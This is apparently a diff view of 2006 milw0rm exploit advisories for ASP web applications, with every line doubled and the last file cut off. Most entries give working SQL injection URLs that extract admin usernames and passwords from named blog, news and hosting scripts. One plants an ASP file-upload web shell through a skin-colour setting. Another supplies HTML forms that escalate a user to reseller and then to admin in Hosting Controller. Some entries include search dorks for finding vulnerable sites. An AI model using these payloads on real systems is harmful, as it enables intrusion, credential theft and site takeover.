#Example: GET -> http://www.victim.com/maxisepetdirectory/default.asp?git=11&link=-1+UNION+SELECT+concat('Üye%20adi:%20<b>',email,'</b><br>','Þifre:%20<b>',sifre,'</b>')+from+uye+ORDER BY email ASC #Example: GET -> http://www.victim.com/maxisepetdirectory/default.asp?git=11&link=-1+UNION+SELECT+concat('Üye%20adi:%20<b>',email,'</b><br>','Þifre:%20<b>',sifre,'</b>')+from+uye+ORDER BY email ASC
# nukedx.com [2006-06-11] # nukedx.com [2006-06-11]
# milw0rm.com [2006-06-11] # milw0rm.com [2006-06-11]

18
platforms/asp/webapps/1930.txt
View file

@ -1,9 +1,9 @@
# There is Sql injection WeBBoA Host Script v1.1 # There is Sql injection WeBBoA Host Script v1.1
# Risk=High # Risk=High
# Exploit: # Exploit:
http://[SITE]/?islem=host_satin_al&id=-1%20%20union%20select%200,1,2,kul_adi,4,5,6,7,sifre%20from%20members+where+uye_id=1 http://[SITE]/?islem=host_satin_al&id=-1%20%20union%20select%200,1,2,kul_adi,4,5,6,7,sifre%20from%20members+where+uye_id=1
# Credit: EntriKa # Credit: EntriKa
# milw0rm.com [2006-06-19] # milw0rm.com [2006-06-19]

102
platforms/asp/webapps/1931.txt
View file

@ -1,51 +1,51 @@
/*------------------------------------------------ /*------------------------------------------------
IHS Public advisory IHS Public advisory
-------------------------------------------------*/ -------------------------------------------------*/
ASP Stats Generator SQL-ASP injection - Code Excution ASP Stats Generator SQL-ASP injection - Code Excution
ASP Stats Generator is a powerful website counter, completely written in ASP programming language. ASP Stats Generator is a powerful website counter, completely written in ASP programming language.
The application is able to track web site activity generating graphical and statistical reports. The application is able to track web site activity generating graphical and statistical reports.
It combines a server side class with a javascript system to get a wide range of visitors' details. It combines a server side class with a javascript system to get a wide range of visitors' details.
http://www.weppos.com http://www.weppos.com
Credit: Credit:
The information has been provided by Hamid Ebadi (IHS : IRAN HOMELAND SECURITY) The information has been provided by Hamid Ebadi (IHS : IRAN HOMELAND SECURITY)
The original article can be found at: The original article can be found at:
http://www.IHSteam.com http://www.IHSteam.com
http://www.hamid.ir/security/ http://www.hamid.ir/security/
Vulnerable Systems: Vulnerable Systems:
ASP Stats Generator 2.1.1 - 2.1 and below ASP Stats Generator 2.1.1 - 2.1 and below
SQL injection : SQL injection :
Example : Example :
The following URL can be used to trigger an SQL injection vulnerability in the pages.asp: The following URL can be used to trigger an SQL injection vulnerability in the pages.asp:
http://localhost/myasg/pages.asp?order='&mese=1 http://localhost/myasg/pages.asp?order='&mese=1
Microsoft JET Database Engine error '80040e14' Microsoft JET Database Engine error '80040e14'
Syntax error in string in query expression 'SUM(Visits) ''. Syntax error in string in query expression 'SUM(Visits) ''.
/myasg/pages.asp, line 236 /myasg/pages.asp, line 236
Exploit : Exploit :
http://localhost/asg/pages.asp?order=ASC union select sito_psw,1,1 from tblst_config&mese=1 http://localhost/asg/pages.asp?order=ASC union select sito_psw,1,1 from tblst_config&mese=1
ASP Code Injection : ASP Code Injection :
Input passed to the strAsgSknPageBgColour (and ...) in "settings_skin.asp" isn't properly sanitised before being stored in the "inc_skin_file.asp". Input passed to the strAsgSknPageBgColour (and ...) in "settings_skin.asp" isn't properly sanitised before being stored in the "inc_skin_file.asp".
This can be exploited to inject arbitrary ASP code. This can be exploited to inject arbitrary ASP code.
Exploit : Exploit :
#F9F9F9" : dim path,hstr, mpath, content, filename: mpath=replace(Request.ServerVariables("PATH_TRANSLATED"),"/","\"): content = request("content"): filename = request("filename"): on error resume next: Dim objFSO,f: Set objFSO = Server.CreateObject ("Scripting.FileSystemObject"): if not filename = "" then: response.Write( "Have File.<BR>" ): path = objFSO.GetParentFolderName( mpath ): path = filename: end if: if not content="" then: response.Write( "Contented.<BR>" ): set f = objFSO.CreateTextFile( path ): response.Write( err.Description & "<BR>" ): f.Write( content ): response.Write( err.Description & "<BR>" ): f.close: end if %><%=filename%><BR><%=path%><BR><%= Request("path") %><BR><FORM ID="SForm" method="post"><TABLE width="300" border="1" ID="Table1"><TR><TD><P align="center"><STRONG><FONT size="6">Upload File</FONT></STRONG></P></TD></TR><TR><TD><TEXTAREA name="content" rows="15" cols="46" ><%=content%></TEXTAREA></TD></TR><TR><TD><P align="center">File Name:<%=strAsgMapPathTo%><INPUT type="text" name="filename" value="<%=filename%>" ></P><P align="center"><INPUT type="submit" value="Upload" ID="Submit1" NAME="Submit1"></P></TD></TR></TABLE></FORM><% objFSO = Nothing: on error goto 0: hstr = " #F9F9F9" : dim path,hstr, mpath, content, filename: mpath=replace(Request.ServerVariables("PATH_TRANSLATED"),"/","\"): content = request("content"): filename = request("filename"): on error resume next: Dim objFSO,f: Set objFSO = Server.CreateObject ("Scripting.FileSystemObject"): if not filename = "" then: response.Write( "Have File.<BR>" ): path = objFSO.GetParentFolderName( mpath ): path = filename: end if: if not content="" then: response.Write( "Contented.<BR>" ): set f = objFSO.CreateTextFile( path ): response.Write( err.Description & "<BR>" ): f.Write( content ): response.Write( err.Description & "<BR>" ): f.close: end if %><%=filename%><BR><%=path%><BR><%= Request("path") %><BR><FORM ID="SForm" method="post"><TABLE width="300" border="1" ID="Table1"><TR><TD><P align="center"><STRONG><FONT size="6">Upload File</FONT></STRONG></P></TD></TR><TR><TD><TEXTAREA name="content" rows="15" cols="46" ><%=content%>&lt;/textarea&gt;</TD></TR><TR><TD><P align="center">File Name:<%=strAsgMapPathTo%><INPUT type="text" name="filename" value="<%=filename%>" ></P><P align="center"><INPUT type="submit" value="Upload" ID="Submit1" NAME="Submit1"></P></TD></TR></TABLE></FORM><% objFSO = Nothing: on error goto 0: hstr = "
[m.r.roohian] [m.r.roohian]
attacker can upload "cmd.asp" with this uploader and ... attacker can upload "cmd.asp" with this uploader and ...
Solution: Solution:
use ASP Stats Generator v2.1.2 (18/06/2006 ) use ASP Stats Generator v2.1.2 (18/06/2006 )
# milw0rm.com [2006-06-19] # milw0rm.com [2006-06-19]

362
platforms/asp/webapps/1987.txt
View file

@ -1,181 +1,181 @@
Title: An attacker can gain reseller privileges and after that can gain admin privileges Title: An attacker can gain reseller privileges and after that can gain admin privileges
Version: 6.1 Hotfix <= 3.1 Version: 6.1 Hotfix <= 3.1
Developer url: www.Hostingcontroller.com Developer url: www.Hostingcontroller.com
Solution: Update to Hotfix 3.2 Solution: Update to Hotfix 3.2
Discover date: 2005,Summer Discover date: 2005,Summer
Report date (to hc company): Sat Jun 10, 2006 Report date (to hc company): Sat Jun 10, 2006
Publish date (in security forums): Thu July 06, 2006 Publish date (in security forums): Thu July 06, 2006
------------------------------------------------------------------------------------- -------------------------------------------------------------------------------------
=============================================== ===============================================
1- This code give resadmin session to a user: 1- This code give resadmin session to a user:
Bug in "hosting/addreseller.asp", No checker is available. Bug in "hosting/addreseller.asp", No checker is available.
--------------------------------------------------- ---------------------------------------------------
<script> <script>
function siteaction(){ function siteaction(){
n_act= "/hosting/addreseller.asp?htype=3" n_act= "/hosting/addreseller.asp?htype=3"
window.document.all.frm1.action = window.document.all.siteact.value + n_act window.document.all.frm1.action = window.document.all.siteact.value + n_act
window.document.all.frm1.submit() window.document.all.frm1.submit()
} }
</script> </script>
<hr><br> <hr><br>
Form1<br> Form1<br>
URL: <input type="text" name=siteact size=70> URL: <input type="text" name=siteact size=70>
<br> <br>
<form name="frm1" method="post" onsubmit="return siteaction()"> <form name="frm1" method="post" onsubmit="return siteaction()">
<table> <table>
<tr> <tr>
<td>reseller</td> <td>reseller</td>
<td><input type="text" name="reseller" value="hcadmin"></td> <td><input type="text" name="reseller" value="hcadmin"></td>
</tr> </tr>
<tr> <tr>
<td>loginname</td> <td>loginname</td>
<td><input type="text" name="loginname" value="hcadmin"></td> <td><input type="text" name="loginname" value="hcadmin"></td>
</tr> </tr>
<tr> <tr>
<td>Password</td> <td>Password</td>
<td><input type="text" name="Password" value=""></td> <td><input type="text" name="Password" value=""></td>
</tr> </tr>
<tr> <tr>
<td>first_name</td> <td>first_name</td>
<td><input type="text" name="first_name" value=""></td> <td><input type="text" name="first_name" value=""></td>
</tr> </tr>
<tr> <tr>
<td>first_name</td> <td>first_name</td>
<td><input type="text" name="first_name" value=""></td> <td><input type="text" name="first_name" value=""></td>
</tr> </tr>
<tr> <tr>
<td>last_name</td> <td>last_name</td>
<td><input type="text" name="last_name" value=""></td> <td><input type="text" name="last_name" value=""></td>
</tr> </tr>
<tr> <tr>
<td>address</td> <td>address</td>
<td><input type="text" name="address" value=""></td> <td><input type="text" name="address" value=""></td>
</tr> </tr>
<tr> <tr>
<td>city</td> <td>city</td>
<td><input type="text" name="city" value=""></td> <td><input type="text" name="city" value=""></td>
</tr> </tr>
<tr> <tr>
<td>state</td> <td>state</td>
<td><input type="text" name="state" value=""></td> <td><input type="text" name="state" value=""></td>
</tr> </tr>
<tr> <tr>
<td>country</td> <td>country</td>
<td><input type="text" name="country" value=""></td> <td><input type="text" name="country" value=""></td>
</tr> </tr>
<tr> <tr>
<td>email</td> <td>email</td>
<td><input type="text" name="email" value=""></td> <td><input type="text" name="email" value=""></td>
</tr> </tr>
<tr> <tr>
<td>phone</td> <td>phone</td>
<td><input type="text" name="phone" value=""></td> <td><input type="text" name="phone" value=""></td>
</tr> </tr>
<tr> <tr>
<td>fax</td> <td>fax</td>
<td><input type="text" name="fax" value=""></td> <td><input type="text" name="fax" value=""></td>
</tr> </tr>
<tr> <tr>
<td>zip</td> <td>zip</td>
<td><input type="text" name="zip" value=""></td> <td><input type="text" name="zip" value=""></td>
</tr> </tr>
<tr> <tr>
<td>selMonth</td> <td>selMonth</td>
<td><input type="text" name="selMonth" value=""></td> <td><input type="text" name="selMonth" value=""></td>
</tr> </tr>
<tr> <tr>
<td>selYear</td> <td>selYear</td>
<td><input type="text" name="selYear" value=""></td> <td><input type="text" name="selYear" value=""></td>
</tr> </tr>
<tr> <tr>
<td>txtcardno</td> <td>txtcardno</td>
<td><input type="text" name="txtcardno" value=""></td> <td><input type="text" name="txtcardno" value=""></td>
</tr> </tr>
</table> </table>
<br><input type="submit"> <br><input type="submit">
</form> </form>
--------------------------------------------------- ---------------------------------------------------
=============================================== ===============================================
2- This code list all of resellers then you must change a password of one of them then login by it for next step. 2- This code list all of resellers then you must change a password of one of them then login by it for next step.
Note: Also by this code, everyone can increase its Credit value then buy every host. Note: Also by this code, everyone can increase its Credit value then buy every host.
--------------------------------------------------- ---------------------------------------------------
<form action="http://[URL]/Admin/Accounts/AccountActions.asp?ActionType=UpdateCreditLimit" method="post"> <form action="http://[URL]/Admin/Accounts/AccountActions.asp?ActionType=UpdateCreditLimit" method="post">
<table> <table>
<tr> <tr>
<td>Username:</td> <td>Username:</td>
<td><input type="text" name="UserName" value="hcadmin"></td> <td><input type="text" name="UserName" value="hcadmin"></td>
</tr> </tr>
<tr> <tr>
<td>Description:</td> <td>Description:</td>
<td><input type="text" name="Description" value=""></td> <td><input type="text" name="Description" value=""></td>
</tr> </tr>
<tr> <tr>
<td>FullName:</td> <td>FullName:</td>
<td><input type="text" name="FullName" value=""></td> <td><input type="text" name="FullName" value=""></td>
</tr> </tr>
<tr> <tr>
<td>AccountDisabled 1,[blank]:</td> <td>AccountDisabled 1,[blank]:</td>
<td><input type="text" name="AccountDisabled" value=""></td> <td><input type="text" name="AccountDisabled" value=""></td>
</tr> </tr>
<tr> <tr>
<td>UserChangePassword:</td> <td>UserChangePassword:</td>
<td><input type="text" name="UserChangePassword" value=""></td> <td><input type="text" name="UserChangePassword" value=""></td>
</tr> </tr>
<tr> <tr>
<td>PassCheck=TRUE,0:</td> <td>PassCheck=TRUE,0:</td>
<td><input type="text" name="PassCheck" value="0"></td> <td><input type="text" name="PassCheck" value="0"></td>
</tr> </tr>
<tr> <tr>
<td>New Password:</td> <td>New Password:</td>
<td><input type="text" name="Pass1" value=""></td> <td><input type="text" name="Pass1" value=""></td>
</tr> </tr>
<tr> <tr>
<td>DefaultDiscount%:</td> <td>DefaultDiscount%:</td>
<td><input type="text" name="DefaultDiscount" value="100"></td> <td><input type="text" name="DefaultDiscount" value="100"></td>
</tr> </tr>
<tr> <tr>
<td>CreditLimit:</td> <td>CreditLimit:</td>
<td><input type="text" name="CreditLimit" value="99999"></td> <td><input type="text" name="CreditLimit" value="99999"></td>
</tr> </tr>
</table> </table>
<br><input type="submit"> <br><input type="submit">
</form> </form>
<hr><br> <hr><br>
--------------------------------------------------- ---------------------------------------------------
=============================================== ===============================================
3- Now you must login by a resseler that changed password from last step. now goto userlist, if there is a user that will enough and if no user available, u must make it! 3- Now you must login by a resseler that changed password from last step. now goto userlist, if there is a user that will enough and if no user available, u must make it!
now select it and click Enter to enter by that user. now the bug will be available: now select it and click Enter to enter by that user. now the bug will be available:
each reseller can gain every user session even "HCADMIN" by bug in "Check_Password.asp" each reseller can gain every user session even "HCADMIN" by bug in "Check_Password.asp"
below code will help you: below code will help you:
--------------------------------------------------- ---------------------------------------------------
<hr><br> <hr><br>
Form1<br> Form1<br>
<form action="http://[URL]/Admin/Check_Password.asp" method="post"> <form action="http://[URL]/Admin/Check_Password.asp" method="post">
<table> <table>
<tr> <tr>
<td>AdName</td> <td>AdName</td>
<td><input type="text" name="AdName" value="hcadmin"></td> <td><input type="text" name="AdName" value="hcadmin"></td>
</tr> </tr>
</table> </table>
<br><input type="submit"> <br><input type="submit">
</form> </form>
<hr><br> <hr><br>
--------------------------------------------------- ---------------------------------------------------
=============================================== ===============================================
------------------------------------------------------------------------------------- -------------------------------------------------------------------------------------
Finder: Soroush Dalili (http://www.google.com/search?hl=en&q="soroush+dalili") Finder: Soroush Dalili (http://www.google.com/search?hl=en&q="soroush+dalili")
Email: Irsdl[47]Yahoo[d07]com Email: Irsdl[47]Yahoo[d07]com
Team: GSG (Grayhatz Security Group) [Grayhatz.net] Team: GSG (Grayhatz Security Group) [Grayhatz.net]
Thanks from: Thanks from:
Farhad Saaedi (farhadjokers[4t]yahoo[d0t]com) Farhad Saaedi (farhadjokers[4t]yahoo[d0t]com)
Small.Mouse from Shabgard.org (small.mouse[4t]yahoo[d0t]com) Small.Mouse from Shabgard.org (small.mouse[4t]yahoo[d0t]com)
Kahkeshan Co. (IT Department) (www.kahkeshan.com) Kahkeshan Co. (IT Department) (www.kahkeshan.com)
Related URLs: Related URLs:
http://hidesys.persiangig.com/other/HC_BUGS_BEFORE3.2.txt (all hc bugs by Irsdl) http://hidesys.persiangig.com/other/HC_BUGS_BEFORE3.2.txt (all hc bugs by Irsdl)
http://hidesys.persiangig.com/other/HC%20Hack%20Prog.rar [password: grayhatz.net] (HC automation hacking program source code by simple VB) http://hidesys.persiangig.com/other/HC%20Hack%20Prog.rar [password: grayhatz.net] (HC automation hacking program source code by simple VB)
# milw0rm.com [2006-07-06] # milw0rm.com [2006-07-06]

24
platforms/asp/webapps/2138.txt
View file

@ -1,12 +1,12 @@
#YenerTurk Haber Script v1.0 SQL Injection Vulnebrality #YenerTurk Haber Script v1.0 SQL Injection Vulnebrality
#Credit:ASIANEAGLE #Credit:ASIANEAGLE
#Contact:admin@asianeagle.org #Contact:admin@asianeagle.org
#Exploit: #Exploit:
Admin Nick: Admin Nick:
http://[SITE]/Path to YenerTurk/default.asp?x=2&kategori=11&id=-1%20union%20select%200,kullanici_adi,2,3,4,5,6,7,8%20from%20admin%20where%20id%20like%201 http://[SITE]/Path to YenerTurk/default.asp?x=2&kategori=11&id=-1%20union%20select%200,kullanici_adi,2,3,4,5,6,7,8%20from%20admin%20where%20id%20like%201
Admin pass: Admin pass:
http://[SITE]/Path to YenerTurk/default.asp?x=2&kategori=11&id=-1%20union%20select%200,sifre,2,3,4,5,6,7,8%20from%20admin%20where%20id%20like%201 http://[SITE]/Path to YenerTurk/default.asp?x=2&kategori=11&id=-1%20union%20select%200,sifre,2,3,4,5,6,7,8%20from%20admin%20where%20id%20like%201
# milw0rm.com [2006-08-07] # milw0rm.com [2006-08-07]

44
platforms/asp/webapps/2186.txt
View file

@ -1,22 +1,22 @@
############################################################### ###############################################################
#Spidey Blog Script <== 1.5 (tr) SQL Injection Vulnerability # #Spidey Blog Script <== 1.5 (tr) SQL Injection Vulnerability #
#Author : ASIANEAGLE # #Author : ASIANEAGLE #
#Site : www.asianeagle.org # #Site : www.asianeagle.org #
#Contact: admin@asianeagle.org # #Contact: admin@asianeagle.org #
############################################################### ###############################################################
#Risk : High #Risk : High
#Download Link Of Spidey Blog : http://www.aspindir.com/Kategoriler/ASP/bloglar #Download Link Of Spidey Blog : http://www.aspindir.com/Kategoriler/ASP/bloglar
#Exploit; #Exploit;
#Admin Nick; #Admin Nick;
http://[SITE]/[Spidey Blog Path]/proje_goster.asp?pid=-1%20union%20select%200,1,2,3,4,sifre,6%20from%20uyeler%20where%20id%20like%201 http://[SITE]/[Spidey Blog Path]/proje_goster.asp?pid=-1%20union%20select%200,1,2,3,4,sifre,6%20from%20uyeler%20where%20id%20like%201
#Admin Password; #Admin Password;
http://[SITE]/[Spidey Blog Path]/proje_goster.asp?pid=-1%20union%20select%200,1,2,3,4,kullanici_adi,6%20from%20uyeler%20where%20id%20like%201 http://[SITE]/[Spidey Blog Path]/proje_goster.asp?pid=-1%20union%20select%200,1,2,3,4,kullanici_adi,6%20from%20uyeler%20where%20id%20like%201
#Greetz: Str0ke #Greetz: Str0ke
Forever milw0rm ;) Forever milw0rm ;)
# milw0rm.com [2006-08-14] # milw0rm.com [2006-08-14]

54
platforms/asp/webapps/2228.txt
View file

@ -1,27 +1,27 @@
################################################################################ ################################################################################
## ## ## ##
## SimpleBlog 2.0 <= "comments.asp" SQL Injection Exploit ## ## SimpleBlog 2.0 <= "comments.asp" SQL Injection Exploit ##
## - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ## ## - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ##
## Credit by | Chironex Fleckeri ## ## Credit by | Chironex Fleckeri ##
## Mail | ChironeX.FleckeriX@Gmail.Com ## ## Mail | ChironeX.FleckeriX@Gmail.Com ##
## Googledork | Powered By SimpleBlog 2.0 ## ## Googledork | Powered By SimpleBlog 2.0 ##
## - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ## ## - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ##
## ## ## ##
################################################################################ ################################################################################
############################################################################################################################################################ ############################################################################################################################################################
#Usage : http://www.target.com/path/comments.asp?id=-1 UNION SELECT ID,uFULLNAME,uUSERNAME,uPASSWORD,uEMAIL,uDATECREATED,null,null FROM T_USERS WHERE id=1 # #Usage : http://www.target.com/path/comments.asp?id=-1 UNION SELECT ID,uFULLNAME,uUSERNAME,uPASSWORD,uEMAIL,uDATECREATED,null,null FROM T_USERS WHERE id=1 #
############################################################################################################################################################ ############################################################################################################################################################
########################################################### ###########################################################
#Admin Panel : http://www.target.com/path/admin/login.asp # #Admin Panel : http://www.target.com/path/admin/login.asp #
########################################################### ###########################################################
# milw0rm.com [2006-08-20] # milw0rm.com [2006-08-20]

54
platforms/asp/webapps/2230.txt
View file

@ -1,27 +1,27 @@
################################################################################ ################################################################################
## ## ## ##
## LBlog <= "comments.asp" SQL Injection Exploit ## ## LBlog <= "comments.asp" SQL Injection Exploit ##
## - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ## ## - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ##
## Credit by | Chironex Fleckeri ## ## Credit by | Chironex Fleckeri ##
## Mail | ChironeX.FleckeriX@Gmail.Com ## ## Mail | ChironeX.FleckeriX@Gmail.Com ##
## Googledork | Powered By LBlog ## ## Googledork | Powered By LBlog ##
## - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ## ## - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ##
## ## ## ##
################################################################################ ################################################################################
################################################################################################################### ###################################################################################################################
#Usage : http://www.target.com/path/comments.asp?id=-1 UNION SELECT 0,username,password,3,4+FROM+LOGIN+WHERE+ID=1 # #Usage : http://www.target.com/path/comments.asp?id=-1 UNION SELECT 0,username,password,3,4+FROM+LOGIN+WHERE+ID=1 #
################################################################################################################### ###################################################################################################################
################################################# #################################################
#Admin Panel : http://www.target.com/path/admin # #Admin Panel : http://www.target.com/path/admin #
################################################# #################################################
# milw0rm.com [2006-08-20] # milw0rm.com [2006-08-20]

32
platforms/asp/webapps/2294.txt
View file

@ -1,16 +1,16 @@
#Muratsoft Haber Portal v3.6 (tr) SQL Injection Vulnerability #Muratsoft Haber Portal v3.6 (tr) SQL Injection Vulnerability
#Author : ASIANEAGLE #Author : ASIANEAGLE
#Site : www.asianeagle.org #Site : www.asianeagle.org
#Contact: admin@asianeagle.org #Contact: admin@asianeagle.org
#Link : http://www.aspindir.com/Goster/4350 #Link : http://www.aspindir.com/Goster/4350
#Demo Portal : http://www.muratsoft.com/haber/www/ #Demo Portal : http://www.muratsoft.com/haber/www/
#Price of Portal: 300YTL // Good money for Bad Script #Price of Portal: 300YTL // Good money for Bad Script
#Exploit : #Exploit :
www.site.com /[portal path]/kategori.asp?kat=-1%20union%20select%200,U_ADI,2,U_SIFRE,4,5,6,7,8,9,10,11,12,13,14%20from%20uyeler%20where%20U_ID%20like%201 www.site.com /[portal path]/kategori.asp?kat=-1%20union%20select%200,U_ADI,2,U_SIFRE,4,5,6,7,8,9,10,11,12,13,14%20from%20uyeler%20where%20U_ID%20like%201
#BURCU Seni hep sevdim hep sevicem. #BURCU Seni hep sevdim hep sevicem.
# milw0rm.com [2006-09-03] # milw0rm.com [2006-09-03]

148
platforms/asp/webapps/2296.txt
View file

@ -1,74 +1,74 @@
_ _ _ _
__ _(_)_ __ ___| |_ __ _ __ _(_)_ __ ___| |_ __ _
\ \ / / | '_ \/ __| __/ _` | \ \ / / | '_ \/ __| __/ _` |
\ V /| | |_) \__ \ || (_| | \ V /| | |_) \__ \ || (_| |
\_/ |_| .__/|___/\__\__,_| \_/ |_| .__/|___/\__\__,_|
|_| AnD |_| AnD
_ _ _ _ _ _ _ _ _ _
_ __ ___ _ _ _ __ __| | ___ _ __ ___| | _(_) | |____ _ __ ___ _ _ _ __ __| | ___ _ __ ___| | _(_) | |____
| '_ ` _ \| | | | '__/ _` |/ _ \ '__/ __| |/ / | | |_ / | '_ ` _ \| | | | '__/ _` |/ _ \ '__/ __| |/ / | | |_ /
| | | | | | |_| | | | (_| | __/ | \__ \ <| | | |/ / | | | | | | |_| | | | (_| | __/ | \__ \ <| | | |/ /
|_| |_| |_|\__,_|_| \__,_|\___|_| |___/_|\_\_|_|_/___| |_| |_| |_|\__,_|_| \__,_|\___|_| |___/_|\_\_|_|_/___|
+-----------------------------------------------------------------+ +-----------------------------------------------------------------+
| Vipsta & MurderSkillz fucking pwnt this webApp | | Vipsta & MurderSkillz fucking pwnt this webApp |
+-----------------------------------------------------------------+ +-----------------------------------------------------------------+
| App Name: SimpleBlog 2.3 | | App Name: SimpleBlog 2.3 |
| App Author: 8pixel.net | | App Author: 8pixel.net |
| App Version: <= 2.3 | | App Version: <= 2.3 |
| App Type: Blog/Journal | | App Type: Blog/Journal |
+-----------------------------------------------------------------+ +-----------------------------------------------------------------+
| DETAILS | | DETAILS |
+-----------------------------------------------------------------+ +-----------------------------------------------------------------+
| Vulnerability: Remote SQL Injection | | Vulnerability: Remote SQL Injection |
| Requirements: Database with UNION support | | Requirements: Database with UNION support |
| Revisions: Note - This is a revision of another vuln | | Revisions: Note - This is a revision of another vuln |
| posted by Chironex Fleckeri | | posted by Chironex Fleckeri |
+-----------------------------------------------------------------+ +-----------------------------------------------------------------+
| CODE | | CODE |
+-----------------------------------------------------------------+ +-----------------------------------------------------------------+
| Vendor "implemented" a fix for SQL injection vulnerabilities. | | Vendor "implemented" a fix for SQL injection vulnerabilities. |
| however this bullshit was easily worked around by | | however this bullshit was easily worked around by |
| Vipsta & MurderSkillz. | | Vipsta & MurderSkillz. |
| | | |
| Vendor attempted to remove illegal characters like ' and = | | Vendor attempted to remove illegal characters like ' and = |
| which stop most SQL injection vulnerabilities. However: | | which stop most SQL injection vulnerabilities. However: |
| Vendor failed to remove '>' symbol. | | Vendor failed to remove '>' symbol. |
+-----------------------------------------------------------------+ +-----------------------------------------------------------------+
| EXPLOIT | | EXPLOIT |
+-----------------------------------------------------------------+ +-----------------------------------------------------------------+
| SQL Injection String: | | SQL Injection String: |
+-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------+ +-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
| http://[target]/[path]/default.asp?view=plink&id=-1%20UNION%20SELECT%20ID,uFULLNAME,uUSERNAME,uPASSWORD,uEMAIL,uDATECREATED,null,null,null%20FROM%20T_USERS%20WHERE%20id>1 | | http://[target]/[path]/default.asp?view=plink&id=-1%20UNION%20SELECT%20ID,uFULLNAME,uUSERNAME,uPASSWORD,uEMAIL,uDATECREATED,null,null,null%20FROM%20T_USERS%20WHERE%20id>1 |
+-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------+ +-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
| TIMELINE | | TIMELINE |
+-----------------------------------------------------------------+ +-----------------------------------------------------------------+
| 9/2/06 - Vendor Notified. | | 9/2/06 - Vendor Notified. |
| 9/2/06 - Vendor Replied. Threatens legal action. | | 9/2/06 - Vendor Replied. Threatens legal action. |
| 9/4/06 - Exploit Released with no details to vendor. | | 9/4/06 - Exploit Released with no details to vendor. |
+-----------------------------------------------------------------+ +-----------------------------------------------------------------+
| SHOUTZ | | SHOUTZ |
+-----------------------------------------------------------------+ +-----------------------------------------------------------------+
| Everyone at g00ns.net - including: | | Everyone at g00ns.net - including: |
| z3r0, spic, arya (aka nex, aka Lythex), FuRy, Mayo, | | z3r0, spic, arya (aka nex, aka Lythex), FuRy, Mayo, |
| TrinTITTY, 0ptix, scuzz, overdose, Cre@mpuff, Riot, | | TrinTITTY, 0ptix, scuzz, overdose, Cre@mpuff, Riot, |
| JuNk, CeLe, LaD, NightSins, Zodiac, grumpy, FiSh, pr0be, | | JuNk, CeLe, LaD, NightSins, Zodiac, grumpy, FiSh, pr0be, |
| ReysRaged, milf <3, gio, RedCoat, and all who I forgot! | | ReysRaged, milf <3, gio, RedCoat, and all who I forgot! |
+-----------------------------------------------------------------+ +-----------------------------------------------------------------+
| ADDITIONAL NOTES | | ADDITIONAL NOTES |
+-----------------------------------------------------------------+ +-----------------------------------------------------------------+
| TeamSpeak: ts.g00ns.net | | TeamSpeak: ts.g00ns.net |
| IRC: irc.g00ns.net | | IRC: irc.g00ns.net |
+-----------------------------------------------------------------+ +-----------------------------------------------------------------+
| PERSONAL STUFF | | PERSONAL STUFF |
+-----------------------------------------------------------------+ +-----------------------------------------------------------------+
| Sess from g00ns.net IS A FUCKING MORON. | | Sess from g00ns.net IS A FUCKING MORON. |
+-----------------------------------------------------------------+ +-----------------------------------------------------------------+
__ __
___ ___ / _| ___ ___ / _|
/ _ \/ _ \| |_ / _ \/ _ \| |_
| __/ (_) | _| | __/ (_) | _|
\___|\___/|_|. \___|\___/|_|.
# milw0rm.com [2006-09-04] # milw0rm.com [2006-09-04]

46
platforms/asp/webapps/2306.txt
View file

@ -1,23 +1,23 @@
################################################################################ ################################################################################
## ## ## ##
## ©ZIXForum 1.12 <= "RepId" Remote SQL Injection ## ## ©ZIXForum 1.12 <= "RepId" Remote SQL Injection ##
## - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ## ## - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ##
## Credit by | Chironex Fleckeri ## ## Credit by | Chironex Fleckeri ##
## Mail | ChironeX.FleckeriX@Gmail.Com ## ## Mail | ChironeX.FleckeriX@Gmail.Com ##
## - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ## ## - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ##
## ## ## ##
################################################################################ ################################################################################
########################################################################################################################################################## ##########################################################################################################################################################
#Username : http://www.target.com/path/ReplyNew.asp?RepId=-1 UNION SELECT null,null,null,J_user,null,null,null,null,null,null,null,null FROM adminlogins # #Username : http://www.target.com/path/ReplyNew.asp?RepId=-1 UNION SELECT null,null,null,J_user,null,null,null,null,null,null,null,null FROM adminlogins #
########################################################################################################################################################## ##########################################################################################################################################################
########################################################################################################################################################## ##########################################################################################################################################################
#Password : http://www.target.com/path/ReplyNew.asp?RepId=-1 UNION SELECT null,null,null,J_pass,null,null,null,null,null,null,null,null FROM adminlogins # #Password : http://www.target.com/path/ReplyNew.asp?RepId=-1 UNION SELECT null,null,null,J_pass,null,null,null,null,null,null,null,null FROM adminlogins #
########################################################################################################################################################## ##########################################################################################################################################################
################################################################ ################################################################
#Admin Panel : http://www.target.com/path/theadmin/default.asp # #Admin Panel : http://www.target.com/path/theadmin/default.asp #
################################################################ ################################################################
# milw0rm.com [2006-09-05] # milw0rm.com [2006-09-05]

26
platforms/asp/webapps/2362.txt
View file

@ -1,13 +1,13 @@
# BiyoSecurity.Org # BiyoSecurity.Org
# script name : TualBLOG v 1.0 # script name : TualBLOG v 1.0
# Risk : High # Risk : High
# Regards : Dj ReMix # Regards : Dj ReMix
# Thanks : Korsan , Liz0zim # Thanks : Korsan , Liz0zim
# Vulnerable file : icerik.asp # Vulnerable file : icerik.asp
exp : exp :
http://site.com/[path]/icerik.asp?icerikno=-1%20union+select+mail,sifre,uyeadi+from+tbl_uye+where+uyeno=1 http://site.com/[path]/icerik.asp?icerikno=-1%20union+select+mail,sifre,uyeadi+from+tbl_uye+where+uyeno=1
uyeno = 1 or 2( Admin ID ) uyeno = 1 or 2( Admin ID )
# milw0rm.com [2006-09-13] # milw0rm.com [2006-09-13]

42
platforms/asp/webapps/2384.txt
View file

@ -1,21 +1,21 @@
Vulnerability Report Vulnerability Report
